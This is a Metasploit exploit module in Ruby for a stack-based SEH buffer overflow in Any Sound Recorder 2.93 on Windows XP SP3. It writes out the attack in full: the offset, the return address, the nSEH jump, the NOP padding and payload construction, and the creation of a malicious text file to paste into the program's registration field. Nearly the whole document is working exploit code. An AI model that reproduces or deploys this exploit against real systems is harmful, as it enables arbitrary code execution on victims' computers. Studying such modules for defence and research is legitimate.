## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Any Sound Recorder 2.93 Buffer Overflow (SEH)', 'Description' => %q{ This module exploits a stack based buffer overflow in Any Sound Recorder 2.93, when with the name "hack.txt". Copy the content of the "hack.txt",Start Any Sound Recorder 2.93 click "Enter Key Code" Paste the content into field "User Name" click "Register" }, 'License' => MSF_LICENSE, 'Author' => [ 'Abdullah AlA+-ASS', # Original discovery 'd3ckx1 d3ck(at)qq.com', # MSF module ], 'References' => [ [ 'OSVDB', '' ], [ 'EBD', '45627' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process' }, 'Platform' => 'win', 'Payload' => { 'BadChars' => "\x00\x0a\x0d", 'DisableNops' => true, 'Space' => 10000 }, 'Targets' => [ [ 'Any Sound Recorder 2.93', { 'Ret' => 0x72d12f35, # 0x72d12f35 : P/P/R FROM msacm32.drv form winxp sp3 'Offset' => 900 } ], ], 'Privileged' => false, 'DisclosureDate' => 'Oct 25 2018', 'DefaultTarget' => 0)) register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.txt']),], self.class) end def exploit buf = "\x90"*(target['Offset']) buf << "\xeb\x06#{Rex::Text.rand_text_alpha(2, payload_badchars)}" # nseh (jmp to payload) buf << [target.ret] .pack('V') # seh buf << make_nops(10) buf << payload.encoded buf << "\x90" * 200 file_create(buf) handler end end